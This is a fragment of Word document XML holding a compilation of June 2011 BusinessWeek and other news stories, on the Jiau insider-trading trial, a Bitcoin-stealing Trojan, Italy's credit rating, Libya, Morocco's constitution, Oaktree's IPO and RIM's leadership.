        <w:t>http://www.businessweek.com/news/2011-06-17/facebook-claimant-passed-lie-detector-test-his-lawyers-say.html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Jiau Jury Begins Deliberations on Insider-Trading Charges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6:04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MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court News Б─≤Hedge Fund PaymastersБ─(tm) Bought Inside Tips From Jiau, U.S. Says Credit Suisse, Deutsche Bank, Goldman, UBS in Court News Ex-Nvidia Analyst Says He Passed Inside Tips to Networker Jiau Ex-Barai Analyst Admits Destroying Data After Rajaratnam Arrest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Patricia Hurtado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prosecutor's rebuttal in sixth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A Manhattan federal jury deliberated about five hours today without reaching a verdict in the case of Winifred Jiau, a former Primary Global Research LLC consultant accused of illegally passing inside tips to hedge fund managers.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say Jiau got financial information from friends at Nvidia Corp. and Marvell Technology Group Ltd. and sold the data to Noah Freeman, a former SAC Capital Advisors LP portfolio manager, and to Samir Barai, founder of New York-based Barai Capital Management LP. Freeman testified that he and Barai paid $10,000 a month for exclusive access to Jiau.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43, of Fremont, California, is charged with securities fraud and conspiracy to commit securities fraud. If convicted, she faces as long as 25 years in prison.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denies the charges. Her lawyer, Joanna Hendon, argued in a closing statement yesterday that while her client did pass the information, it wasn't "material," meaning it wasn't something a reasonable investor would consider important in trading and it wouldn't have a bearing on the stock price.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 is the first of the so-called expert networkers to go on trial since the U.S. charged at least a dozen people, including consultants and fund managers, with insider trading beginning in November. Primary Global, based in Mountain View, California, links investors with industry experts at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Jiau's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Freeman and Jason Pflaum, an analyst who worked for Barai, both pleaded guilty and testified for the prosecution. A third man who admitted being part of the scheme, Sonny Nguyen, a former Nvidia financial analyst who was a friend of Jiau's, testified that he passed confidential information about the chipmaker's quarterly earnings to her in August 2008.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today rebutting Hendon's argument, Assistant U.S. Attorney David Leibowitz told the jury that Jiau's own actions belied the claim that the information she passed wasn't material.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that in May 2008, at the same time Jiau was passing Freeman and Barai Marvell earnings information before its public disclosure, Jiau bought 875 shares of Marvell stock for her own account. Jiau also purchased Nvidia stock at the same time she was passing information about that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‘Important and Material'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Hendon's own client refutes what she spent more than an hour talking about yesterday," Leibowitz said. "This is evidence that the information Winifred Jiau obtained and passed was important and material."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Freeman told the jury that he, Barai and Jiau spoke in code. Company insiders were "cooks," money was "sugar" and inside information was "recipes,"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"Cooks are on strike now," Jiau wrote in a June 3, 2008, e-mail to Barai, which Leibowitz showed jurors today. "So drop some of your extra sugar to me," she wrote. "Cooks don't talk to me without sugar."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Leibowitz also cited a message Jiau sent Barai when the portfolio manager started his new fund.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"Same relationship meaning same amount as you were in the last job," Jiau wrote in the March 10, 2008,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costs," she wrote. "I need to pay to my 2 secured sources," Jiau continued. "They supply the actual numbers to the decimal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Leibowitz called it "devastating evidence."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afternoon, jurors asked U.S. District Judge Jed Rakoff questions about the laws on securities fraud and to re-hear testimony from Nguyen. They are to resume deliberations June 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U.S. v. Jiau, 1:11-cr-00161, U.S. District Court, Southern District of New York (Manhattan).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Stephen Farr, Andrew Dunn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Patricia Hurtado in New York at pathurtado@bloomberg.net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Insider Trading Business Lawsuits Green Cars Asian Automakers Public Relations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02:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/jiau-jury-begins-deliberations-on-insider-trading-charges.html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Digital crooks target virtual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authors move fast, Symantecs Stephen Doherty said in a blog post about digital pickpockets targeting Bitcoin, which was created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seen a recent Trojan in the wild targeting Bitcoin wallets in computers running various versions of Windows, Doherty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one motive: to locate your Bitcoin wallet.dat file and email it to the attacker, Doherty said. This is not surprising considering the potential values in a Bitcoin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digital currency that are accepted by a few online merchants. They can be traded at online currency exchanges such as Mtgox.com for real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Doherty said Bitcoin users should consider encrypting their wallet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Bitcoins, you have the option to encrypt your wallet and we recommend that you choose a strong password for this in the event that an attacker is attempting to brute-force your wallet open,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a Bitcoin user going by the handle of allinvain claimed on a public Bitcoin forum that his computer had been hacked and 25,000 Bitcoins worth $500,000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drawn the attention of members of the US Senate recently following a report that they have been used to purchase prescription drugs, cocaine, LSD and heroin at an online network called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Joe Manchin, a Democrat from West Virginia, and Senator Charles Schumer, a Democrat from New York, wrote a letter to the US Attorney General and the Drug Enforcement Agency asking for the immediate shutdown of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purchasing Bitcoins through an exchange, a user can create an account on Silk Road and start purchasing illegal drugs from individuals around the world and have them delivered to their homes within days,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F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The Peninsula 2011.06.18 01:31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.thepeninsulaqatar.com/international/156116-digital-crooks-target-virtual-money.html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Italy's Aa2 Debt Credit Ratings May Be Cut, Moody's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5:44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Strengthens After Merkel Agrees to Greek Debt Compromise Greek Bonds Sink, CDS Jump to Record as Default Concern Mounts Greece Credit-Default Swaps Surge to Record 2,189 Basis Points Greek Government Bonds Drop as Bailout Talks Stall; Bunds Rise BNP Paribas, Biggest French Banks May Be Cut by MoodyБ─(tm)s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Dave Liedtka and Timothy R. Homan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details of statement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Italy's credit ratings may be reduced by Moody's Investors Service because of economic growth challenges, risks associated with efforts to reduce debt and the potential for higher borrowing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third-ranked Aa2 local and foreign-currency government bond ratings were placed under review for a possible downgrade, Moody's said in a statement today. The country's short-term Prime-1 ratings were affirmed.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may have trouble reducing its public debt to more affordable levels as borrowing costs rise and support for the government of Prime Minister Silvio Berlusconi weakens, Moody's said. The review will focus on the growth prospects for the euro region's third-largest economy and the outlook for a removal of structural bottlenecks that could hinder a medium- term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economy faces growth challenges in an environment characterized by long-term structural impediments to growth," Moody's said. "The fragile market sentiment that continues to surround European sovereigns with high levels of debt poses additional risks for Italy."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had debt of about 1.8 trillion euros ($2.6 trillion) at the end of last year and a ratio of debt to gross domestic product of about 119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announcement follows a similar move by Standard &amp; Poor's last month. Italy had its credit-rating outlook lowered to negative from stable by S&amp;P, which cited the nation's slowing growth and "diminished" prospects for a reduction of government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Rating Affirmed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S&amp;P affirmed the country's A+ long-term rating, the fifth highest, and its top-ranked A-1+ short-term rating, the company said in a May 20 statement.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economy expanded 0.1 percent in the first quarter, less than economists had estimated, as gains in exports failed to offset weak domestic demand. The economy won't return to its pre-recession level for at least another two years, and the $2.3 trillion economy needs to raise productivity, the OECD said last month in a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Christopher Wellisz, Kevin Costelloe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Timothy R. Homan in Washington at thoman1@bloomberg.net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Christopher Wellisz at cwellisz@bloomberg.net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Credit-Rating Agency Reform Small Business Debt Sovereign Debt Debt Settlement Consumer Credit Counseling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http://www.businessweek.com/news/2011-06-17/italy-s-aa2-debt-credit-ratings-may-be-cut-moody-s-says.html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Dollar's Decade-Long Bear Market Is Ending, Citigroup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5:21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Strengthens After Merkel Agrees to Greek Debt Compromise Swedes Sidestep Greek Morass by Avoiding Euro: Brendan Greeley Euro Bounce on Aid for Greece May Be Limited, Citigroup Says Greek Bonds Sink, CDS Jump to Record as Default Concern Mounts Greek Government Bonds Drop as Bailout Talks Stall; Bunds Rise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Catarina Saraiva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comment from Fitzpatrick in the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The dollar is poised to reverse its almost decade- long bear market trend as global growth slows, Europe's debt problems worsen and the Federal Reserve ends its asset-buying program, according to Citigroup Inc.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may stop weakening, as it has since the 2000- 2002 period, and enter a bull market for the first time since 1995, Tom Fitzpatrick, chief technical analyst at Citigroup Inc. in New York, said in a note to clients.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"Slowly but surely things have been building up," Fitzpatrick said in a telephone interview. "We started to notice one by one all of these dynamics coming together in terms of the way the dollar was trading, the way equities were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Index, which measures the greenback against the currencies of its six major trading partners, has fallen 38 percent since reaching a high of 121.020 in July 2001. It traded at 75.012 at 4:49 p.m.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 this month will end a $600 billion Treasury-buying program it implemented in November in an effort to stimulate the U.S. economy. The central bank is unlikely to introduce another such program, Fitzpatrick said. As equities, commodities, and currencies linked to growth underperform, the dollar will benefit, he added.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&amp; Poor's 500 Index ended the week little changed after falling for six straight weeks. The Thomson Reuters/Jefferies CRB index of raw materials dropped 3.6 percent this week, the most since the five days ended May 6.</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Sovereign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leaders are working to finalize a second rescue package for Greece, which may need to rollover maturing bonds to avoid a default. Moody's Investors Service placed Italy's Aa2- sovereign rating on review for possible downgrade, signaling concern about the contagion effects of Greece's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above suggests a very pretty picture ahead and in a lot of instances suggests a possible reversal of the position of the abundant U.S. dollar supply and flow of money out of the U.S. and a possible reversal of the ‘monster carry trade' of the U.S. dollar as a funding currency to the world," Fitzpatrick wrote.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 interest rates in the U.S. make the dollar ideal as a funding currency to buy higher-yielding assets elsewhere.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Dave Liedtka, Greg Storey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Catarina Saraiva in New York at asaraiva5@bloomberg.net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Dave Liedtka at dliedtka@bloomberg.net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Green Marketing The Foreign Exchange Market Content Marketing Gay Business and Marketing Brand Marketing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http://www.businessweek.com/news/2011-06-17/dollar-s-decade-long-bear-market-is-ending-citigroup-says.html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Lugar Gives Obama Mediocre Grade for U.S. Foreign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4:58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Obama Tees Up With Boehner to Negotiate Fairways, Not Budget Libya Dispute Has Obama and Boehner Recasting Old Arguments Obama Said to Talk With CommerceБ─(tm)s Blank on Economist Job Weiner of New York Said to Plan to Resign From U.S. House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Dodge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Lugar comments on Afghanistan in 12th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Republican U.S. Senator Richard Lugar, a onetime supporter of President Barack Obama's foreign policy, said the president's performance has slipped to "at best" mediocre.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efforts in Afghanistan do not really have the benefit of objectives and a very clear path," Lugar, the top Republican on the Foreign Relations Committee, said in an interview on Bloomberg Television's "Political Capital with Al Hunt," airing this weekend. "The Libya situation borders on being a fiasco altogether."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diplomacy with Pakistan "certainly leaves a lot to be desired," said Lugar. "In short, this is not a situation that is going particularly well." In addition, he said, "We have a NATO alliance that is becoming weaker as time goes on," referring to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give Obama a foreign policy grade of "at best a C." Lugar said two years ago the president deserved an "A" because the administration was more inclusive and reached out more to U.S. allies than did Republican President George W. Bush.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reiterated his criticism of the Obama administration for its refusal to seek congressional approval for U.S. involvement in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in conflict with some lawmakers over his commitment of U.S. forces to an air campaign with NATO allies against Muammar Qaddafi's troops. The administration argues that it doesn't need authorization from Congress, and Lugar has called that position "legally dubious and unwise."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‘Might Get Lucky'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suggested that the administration miscalculated in its decision to join the conflict, which is entering its fourth month with Qaddafi still in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guess is that the president or others felt they might get lucky, that if they did look as if NATO was coming in, Qaddafi would say, ‘It is time for me to go,'"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six-term Indiana lawmaker said if a resolution to support the U.S. action in Libya were brought up for a vote in the Senate, he wouldn't support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wait until after a hearing he has sought on the administration's rationale for involvement in Libya before deciding whether to support cutting off funding for the mission if the president continues refusing to seek authorization.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in Afghanistan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war in Afghanistan, Lugar embraced the idea of a reduction in U.S. forces to 20,000 or 30,000 as suggested by the president of the Council on Foreign Relations, Richard Haass, at a congressional hearing.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level of troop drawdown could probably be reached within a year,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 has started paring U.S. forces in Afghanistan, even before Obama decides on the full size of the promised reduction, by re-routing 800 soldiers that were in training for the conflict.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administration is considering how much to cut troop strength in Afghanistan to meet the president's December 2009 pledge of starting to reduce the U.S. presence there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under pressure from fellow Democrats and some Republicans for a sizable cut in the almost 100,000 U.S. forces in Afghanistan, fighting alongside 47,000 troops from other countries in the NATO-led coalition.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the administration has said that the wars in Afghanistan and Iraq are only costing $117 billion this year as opposed to $159 billion the year before, this is a disproportionate amount of the defense budget on one small country,"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said Pakistan "is a real worry" in terms of the safety and security of its nuclear weapons.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raised this question, and the Pakistanis have said this is our sovereign right to deal with this," he said. "As a matter of fact, they have felt we have been more and more intrusive and that we ought to get over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Laurie Asseo, Ann Hughey.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Dodge in Washington at cdodge1@bloomberg.net.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in Washington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Economic Policy U. S. Broadband Policy U.S. Energy Policy U.S. Automakers U.S. Competitiveness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http://www.businessweek.com/news/2011-06-17/lugar-gives-obama-mediocre-grade-for-u-s-foreign-policy.html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Moroccan King Mohammed VI Proposes Changes to Constitution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5:40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King Mohammed of Morocco Announces Constitutional Changes Saudi Arabian Women Use Their Cars to Call for End to Ban Syria Regime Sends Army Into Northern Town as Residents Flee ZawahiriБ─(tm)s Appointment Shows Al-Qaeda Still a Threat, Gates Says Syrians Flee Second Northern Town as Army Said to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Aida Alami and Caroline Alexander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&lt;GO&gt; and MET &lt;GO&gt; for more on the regional turmoil.)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Morocco's King Mohammed VI, responding to calls for more democracy, introduced a revised constitution for the North African nation and said a referendum will be held on July 1 on the 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will say yes to this project," King Mohammed said in an address today broadcast on television and radio. The constitutional changes, he said, will "make Morocco a state that will distinguish itself by its democratic course."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king will no longer name the prime minister, he said. That post will be secured in a vote and the premier will become head of the government. The monarch will continue to hold the power to overrule or dissolve parliament, which is elected.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rights will be set according to "international standards" guaranteeing economic and political equality between men and women, transparent justice, freedom of speech and of the press, the king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draft constitution offers a "considerable strengthening" of individual rights, said Nadir El Moumni, a constitutional and political expert at Mohammed V University in Rabat, in a telephone interview. "The King's powers would be reorganized, redeployed in a more strategic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Demonstrations calling for a reduction in the king's power began in February. They haven't reached the scale of the popular movements that toppled governments in Egypt and Tunisia. Security forces clashed with protesters on May 29 and one activist in the coastal city of Safi died from injuries.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Berbers' Language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King Mohammed said in March he would introduce more liberties.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proposed changes include allowing Moroccans to vote abroad, and making Amazigh, spoken by the ethnic Berber minority, an official language in addition to Arabic.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Islam would continue to be the state religion but the nation's 32 million people would have freedom of religion. This proposed change drew criticism from Abdelilah Benkirane, leader of the Justice and Development Party, an Islamist party.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true that His Majesty the King in his March 9 speech gave us assurances on the Islamic identity of the state," he told reporters on June 10, after seeing the draft document. "However, I have fears that it will be undermined."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technically the head of state, the king is the country's secular and religious leader. The changes propose the monarch will no longer be considered sacred, though he'd remain inviolable and maintain the role of "commander of the faithful."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Balance of Powers'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Nabil Benabdallah, secretary general of the Progress and Socialism Party, said the changes show Morocco is entering a new era as a parliamentary constitutional monarchy.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will be a new balance of powers," Benabdallah said. "It paves the way toward the establishment of a democratic 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Morocco's economy may expand 4.6 percent this year, compared with 3.3 percent in 2010, according to the state statistics office. Tourism accounts for almost 10 percent of gross domestic product, raising $7 billion last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Ben Holland, Terry Atlas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Aida Alami in Cairo at aalami2@bloomberg.net; Caroline Alexander in London at calexander1@bloomberg.net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Andrew J. Barden at barden@bloomberg.net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Change Management Global Climate Change Career Change Oil and Gas Recruitment Activist Shareholder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http://www.businessweek.com/news/2011-06-17/moroccan-king-mohammed-vi-proposes-changes-to-constitution.html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Marks's Oaktree Capital Files IPO to Join U.S.-Listed Rivals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5:49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RBC Said to Near Sale of U.S. Bank Unit to PNC Financial Pandora Falls Below IPO Price, Reversing YesterdayБ─(tm)s Gain U.S. Stock Fund Withdrawals Most in Six Months as Markets Fall Carlyle Group Said to Interview Banks in Preparation for IPO Blackstone Turns Graham IPO Flop Into Lucrative Bids: Real M&amp;A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Gillian Wee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Blackstone share performance in sixth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Oaktree Capital Management LP, the biggest distressed- debt investor, filed to sell shares in an initial public offering, following private-equity rival Apollo Global Management LLC which went public in March.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which hasn't set a price range or the number of shares it aims to sell, registered for an IPO of $100 million. That amount is probably a placeholder to calculate filing fees, and the final amount may vary. Proceeds from the sale by Chairman Howard Marks's firm will be used to buy interests from principals, employees and investors, Los Angeles-based Oaktree said today in a filing with the U.S. Securities and Exchange Commission.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Oaktree, which managed more than $80 billion as of March 31, according to the filing, is pursuing an offering after mixed results from leveraged- buyout firms Blackstone Group LP, Apollo and KKR &amp; Co. since going public. Oaktree raised about $1 billion in May 2007 when it sold a 15 percent stake on the private exchange run by Goldman Sachs Group Inc., a transaction valuing the company at $6.3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Oaktree was started in 1995 by Marks and six partners from Los Angeles- based investment firm TCW Group Inc. Marks, 65, a billionaire who owns about one-sixth of Oaktree, named the firm for the English translation of his Santa Barbara, California, weekend home, Las Encinitas.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firm's 17 distressed-debt funds averaged annual gains of 19 percent after fees for the past 22 years, about 7 percentage points better than its peers tracked by Boston-based consulting firm Cambridge Associates LLC.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Blackstone, Apollo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Blackstone, the world's largest private-equity firm, garnered $4.1 billion in its 2007 IPO, a year before the failures of Bear Stearns Cos. and Lehman Brothers Holdings Inc. jolted financial markets. The shares have fallen 46 percent below their IPO price, even after gaining 18 percent year-to- date, as of June 17. Apollo has declined 16 percent from its March 29 offering that generated $565 million. KKR, which gained a U.S. listing in July 2010, has risen 48 percent in New York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three competitors are based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Opportunities for making money in distressed investing dwindled in the past few years as the economy improved.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times when it is important to invest cautiously, and there are times when it's important to invest aggressively," Marks said in an interview before the filing. "A big part of the job is knowing where we are and choosing between those two. We believe that compared to one year, two years, maybe three years ago, this is the time to invest cautiously."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Returning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and April, Marks returned a total of $4.4 billion to investors in his $11 billion OCM Opportunities Fund VIIB, the largest distressed-debt pool in history. Oaktree had invested about $6 billion in the most senior debt of failing companies during the 15 weeks following Lehman Brothers' bankruptcy in September 2008, generating a gross annual return of 31 percent for the fund since its inception.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40 percent of Oaktree's assets are in distressed debt, 25 percent are in corporate bonds and 18 percent are devoted to so-called control investing, under which Oaktree takes ownership of firms by buying their debt or equity. Oaktree runs 16 strategies and has invested in troubled media company Tribune Co., movie-theater chain Regal Entertainment Group and CIT Group Inc., the small-business lender that came out of bankruptcy in December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Thirty-nine percent of the money Oaktree oversees comes from public pools led by pensions and sovereign-wealth funds, and 29 percent is from corporations. The firm's other clients include endowments, foundations, insurance companies, wealthy individuals and mutual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Goldman Sachs and Morgan Stanley are listed as the IPO underwriters. The shares will trade on the New York Stock Exchange under the ticker symbol OAK.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Josh Friedman, Christian Baumgaertel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Gillian Wee in New York at gwee3@bloomberg.net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Christian Baumgaertel at cbaumgaertel@bloomberg.net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Automakers U.S. Competitiveness U.S. Retail Sales U.S. Stock Market U.S. Energy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http://www.businessweek.com/news/2011-06-17/marks-s-oaktree-capital-files-ipo-to-join-u-s-listed-rivals.html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RIM Shareholder Jarislowsky Adds Call for Chairman-CEO Split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5:36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Oracle Seeks Б─≤BillionsБ─(tm) From Google in Java Patent Lawsuit RIM Drops to Four-Year Low After Forecast Misses Estimates AngieБ─(tm)s List Is Said to Pick BofA to Handle Planned August IPO Nortel Delays Auction to June 27 on Б─≤SignificantБ─(tm) Interest Johnson Exit Leaves Apple Without Retail Head Amid Expansion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Hugo Miller and Jonathan Erlichman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Jarislowsky's comments in eighth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Billionaire Stephen Jarislowsky, one of Research In Motion Ltd.'s largest shareholders, added his name to the call for the BlackBerry smartphone maker to split the roles of chairman and chief executive officer.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should not have these two people at both positions because they have worked together all their lives and they are basically the same person, from point of view of policy," Jarislowsky, chairman of Jarislowsky Fraser Ltd., said today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Montreal-based investment firm - formerly the company's sixth-biggest investor, with 10.2 million shares of RIM at the end of the first quarter - has sold more than half its stake,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 investors are becoming increasingly vocal about their dissatisfaction with co-CEOs Jim Balsillie and Mike Lazaridis, after the company's second- quarter sales and profit forecast missed analysts estimates, hurt by sluggish demand for its aging BlackBerry portfolio. Lazaridis, who invented the BlackBerry to handle mobile e-mail, has shared the role of CEO with Jim Balsillie since 1992. They are also both co-chairmen.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Northwest &amp; Ethical Investments LP has called for RIM to separate the roles of chairman and CEO, and shareholders will vote on that question at the company's shareholder meeting July 12, according to a RIM proxy statement last week. Separating the two posts does put the board in a better position "to ask the CEO the kind of hard questions they have to ask from time to time," Robert Walker, vice president of ethical funds at Northwest &amp; Ethical, said in an interview last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Tumble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 based in Waterloo, Ontario, plunged $7.58, or 21 percent, to $27.75 at 4 p.m. New York time in Nasdaq Stock Market trading, dropping to its lowest level since 2006. The stock has fallen 52 percent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analysts have criticized the co-CEO structure. Northern Securities Inc.'s Sameet Kanade suggested in April that the company should put Lazaridis in sole charge.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Jarislowsky is critical of Balsillie, who he says has lost focus.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believe he is taking his eye off the ball," Jarislowsky said. "He's gotten involved in all sorts of things outside the business."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NHL Attempts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Balsillie has tried unsuccessfully to bring U.S.-based National Hockey League franchises to Canada in recent years. He also is the founder of the Balsillie School of International Affairs and chairman of the Centre for International Governance Innovation, both in Waterloo.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Balsillie's own suitability for the role, other analysts have criticized what they see as the inefficiency of the co-CEO structure, because it creates an unnecessary duplication of responsibilities that slows product development.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dual CEOs, you have a challenge," said Brian Modoff, an analyst at Deutsche Bank Securities Inc. in San Francisco. "There are teams that are working on certain functions, but only reporting to one or the other CEO."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Lazaridis acknowledged the investor frustration on a conference call with analysts yesterday, saying he knew the past few months had been "difficult" for shareholders.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 can't promise that there won't be bumps in the road ahead, I can assure you that Jim and I have never been more committed to the business," Lazaridis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men defended the co-CEO structure and gave no indication they plan to abandon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don't think it's the issue," Balsillie told analysts. "I think I have expertise in what I do. I think Mike has distinctive expertise in what he does. I think there's parts that overlap and we highly coordinate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analysts downgraded the company today, including Caris &amp; Co.'s Rob Cihra. RIM has proved "painfully slow" in getting new models including its touch-screen Bold into stores to keep BlackBerry customers from defecting to Apple Inc.'s iPhone or devices that run Google Inc.'s Android software,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RIM has slipped into eroding mismanagement,"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Nick Turner, Lisa Rapaport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Hugo Miller in Toronto at hugomiller@bloomberg.net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Bitcoins: Currency of the Geeks MBA Jobs: Post-Crisis, a Brave New World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Activist Shareholder Call Center Optimization IT for Oil and Gas Preferred Stock Skype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01:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-17/rim-shareholder-jarislowsky-adds-call-for-chairman-ceo-split.html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King Mohammed of Morocco Announces Constitutional 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4:37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SudanБ─(tm)s Abyei Clashes Displace 113,000 People, UN Reports Qaddafi WonБ─(tm)t Step Down, Russian Envoy Says After Tripoli Talks Syrians Flee Second Northern Town as Army Said to Approach Pakistan Says Dozens of Civilians Held After Bin Laden Raid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Nadeem Hamid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King Mohammed VI of Morocco announced constitutional ammendments that would change the goverance of the North African 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constitution will provide more power for the elected parliament,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constitutional measures will provide for human rights, criminalize torture and assure equal rights for women, he said in a televised address to the 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Nadeem Hamid in Washington at nhamid3@bloomberg.net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Terry Atlas at tatlas@bloomberg.net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Change Management Global Climate Change Out-of-Home Advertising Sloan School of Management Career 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http://www.businessweek.com/news/2011-06-17/king-mohammed-of-morocco-announces-constitutional-changes.html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Qaddafi Forces Hit Misrata City Center for First Time in Weeks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4:46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Qaddafi WonБ─(tm)t Step Down, Russian Envoy Says After Tripoli Talks Syria Regime Sends Army Into Northern Town as Residents Flee Syrians Flee Second Northern Town as Army Said to Approach Libya Mission Will Violate War Powers June 19, Boehner Says Turkey Spurns Aid as Syrian Attacks Forces More to Flee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Chris Stephen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EXTRA and MET for more on Middle East unrest.)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16 (Bloomberg) - Forces loyal to Libyan leader Muammar Qaddafi launched rockets at the port and center of Misrata, attacking the besieged western city for the first time in weeks.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Separately, a Russian envoy said Libyan officials indicated Qaddafi has no intention of giving up power, a point the Libyan leader made himself in an audio message aired on state television.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Qaddafi vowed that his forces would defeat NATO's campaign, speaking in an audio message to his supporters in the capital, Tripoli, which came under attack by NATO warplanes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want to negotiate, we are resilient even if they strike with atomic bombs," he said. "We will provoke them to use atomic bombs, let them strike with atomic bombs."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strike by Qaddafi's forces was the first on Misrata itself since government units were pushed out of the urban areas on May 12 and coincided with an assault on the western outskirts of the city by infantry and artillery.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Misrata's Hikma hospital reported 11 dead and 41 wounded in the attack on the forward positions. One woman was killed and two of her children injured by the government bombardment of the rebel-held city, said Radio Misrata.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in the day, NATO jets flew over the city 125 miles (200 kilometers) east of the capital, and 23 detonations were heard beyond the rebel front line near the town of Zlitan. Reports that this was NATO bombing of government forces couldn't be confirmed.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Apache Warnings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NATO dropped thousands of leaflets this week on the Libyan government front lines around Misrata. The flyers showed a picture of an Apache helicopter and threatening retaliation against any forces firing at civilian areas.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Western and Arab leaders are demanding an end to Qaddafi's four-decade rule, and NATO aircraft are targeting his forces in a military campaign about to enter its fourth month. Qaddafi has held on longer than the alliance initially predicted.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fighting has largely halted Libya's oil exports. Eni SpA said there has been no damage as far as it knows to its Libyan facilities. It will take months for oil output to resume, Chief Executive Officer Paolo Scaroni said in an interview in St. Petersburg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Crude oil dropped to the lowest level in almost four months today in New York on doubts European efforts to resolve the Greek debt crisis will succeed, spurring concern of reduced economic growth and fuel demand.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Drops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Crude oil for July delivery dropped $1.94 to $93.01 a barrel on the New York Mercantile Exchange, the lowest settlement price since Feb. 18. Today's move capped the biggest weekly decline in six weeks.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envoy to Africa said that Qaddafi refuses to step down, after talks with government officials in Tripoli.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prime minister said Qaddafi doesn't intend to resign," Mikhail Margelov said today by telephone from Tunis, a day after meetings with Libyan officials including Prime Minister Baghdadi Mahmudi. "For the government of Tripoli, they aren't prepared to discuss the future of Qaddafi."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Margelov said Mahmudi assured him they were in direct contact with the rebels. Abdel Hafiz Ghoga, vice president of the rebel National Transitional Council, denied any direct contact with Qaddafi's government, according to a report today by Russian news service RIA Novosti.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Margelov, who earlier this month held talks with rebels in the eastern port city of Benghazi, said there need to be "clear rules of the game" to achieve a handover of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Caroline Alexander in London, Henry Meyer in Moscow, Mark Shenk in New York, Alessandra Migliaccio in Rome and Nadeem Hamid in Washington. Editor: Terry Atlas, Ann Hughey.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Chris Stephen in Misrata at chrisstephen2005@yahoo.co.uk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Andrew J. Barden at barden@bloomberg.net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First Time Home Buying First-Time Investing City of London Investing in Growth Stocks Call Center Optimization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http://www.businessweek.com/news/2011-06-17/qaddafi-forces-hit-misrata-city-center-for-first-time-in-weeks.html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Falcone's LightSquared Reaches Network Deal With Sprint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4:51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RBC Said to Near Sale of U.S. Bank Unit to PNC Financial AngieБ─(tm)s List Is Said to Pick BofA to Handle Planned August IPO Capital One Said to Near $9 Billion Deal for ING Direct USA Carlyle Group Said to Interview Banks in Preparation for IPO Citigroup Hires Hoover for Capital Markets Origination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Greg Bensinger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potential value of deal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Billionaire Philip Falcone's LightSquared Inc. reached a 15-year deal with Sprint Nextel Corp. to share network expansion costs and equipment, and to provide high-speed wireless service to the phone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Falcone told Harbinger Capital Partners investors about the accord in a letter today obtained by Bloomberg News. The companies were discussing a deal valued at as much as $20 billion, people familiar with the matter said earlier this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and Sprint will jointly develop, deploy and operate LightSquared's 4G LTE network," according to the letter. "Sprint will become a significant customer of LightSquared's 4G LTE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 which has lost contract customers in 14 of the past 15 quarters, has pledged $5 billion to upgrade its network over the next three to five years. Sprint Chief Executive Officer Dan Hesse said last month that his company was in talks with Clearwire Corp. on a similar network deal. Kirkland, Washington- based Clearwire provides Sprint's fourth-generation wireless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CEO Sanjiv Ahuja said in a June 10 televised interview with "Bloomberg West" that the companies had held discussions. Bill White, a Sprint spokesman, declined to comment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LightSquared is backed by Falcone's Harbinger hedge fund, based in New York. Steve Bruce, a spokesman for Harbinger, didn't immediately return a call seeking comment.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Overland Park, Kansas-based Sprint is the third-biggest U.S. wireless provider, trailing Verizon Wireless and AT&amp;T Inc. in subscribers.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Saijel Kishan in New York. Editor: Julie Alnwick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Greg Bensinger in New York at gbensinger1@bloomberg.net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Peter Elstrom at pelstrom@bloomberg.net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Business Networking Events Ad Networks Microsoft-Yahoo Deal Network Neutrality Network Infrastructure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http://www.businessweek.com/news/2011-06-17/falcone-s-lightsquared-reaches-network-deal-with-sprint.html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Lugar Gives Obama Mediocre Grade for U.S. Foreign Policy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4:58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Libya Dispute Has Obama and Boehner Recasting Old Arguments Pentagon Starts Paring Troops in Afghan War as Drawdown Looms Obama Said to Talk With CommerceБ─(tm)s Blank on Economist Job Weiner of New York Said to Plan to Resign From U.S. House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Catherine Dodge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Lugar comments on Afghanistan in 12th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Republican U.S. Senator Richard Lugar, a onetime supporter of President Barack Obama's foreign policy, said the president's performance has slipped to "at best" mediocre.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efforts in Afghanistan do not really have the benefit of objectives and a very clear path," Lugar, the top Republican on the Foreign Relations Committee, said in an interview on Bloomberg Television's "Political Capital with Al Hunt," airing this weekend. "The Libya situation borders on being a fiasco altogether."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diplomacy with Pakistan "certainly leaves a lot to be desired," said Lugar. "In short, this is not a situation that is going particularly well." In addition, he said, "We have a NATO alliance that is becoming weaker as time goes on," referring to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give Obama a foreign policy grade of "at best a C." Lugar said two years ago the president deserved an "A" because the administration was more inclusive and reached out more to U.S. allies than did Republican President George W. Bush.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reiterated his criticism of the Obama administration for its refusal to seek congressional approval for U.S. involvement in Libya.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in conflict with some lawmakers over his commitment of U.S. forces to an air campaign with NATO allies against Muammar Qaddafi's troops. The administration argues that it doesn't need authorization from Congress, and Lugar has called that position "legally dubious and unwise."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‘Might Get Lucky'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suggested that the administration miscalculated in its decision to join the conflict, which is entering its fourth month with Qaddafi still in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guess is that the president or others felt they might get lucky, that if they did look as if NATO was coming in, Qaddafi would say, ‘It is time for me to go,'"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six-term Indiana lawmaker said if a resolution to support the U.S. action in Libya were brought up for a vote in the Senate, he wouldn't support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Lugar said he would wait until after a hearing he has sought on the administration's rationale for involvement in Libya before deciding whether to support cutting off funding for the mission if the president continues refusing to seek authorization.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in Afghanistan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war in Afghanistan, Lugar embraced the idea of a reduction in U.S. forces to 20,000 or 30,000 as suggested by the president of the Council on Foreign Relations, Richard Haass, 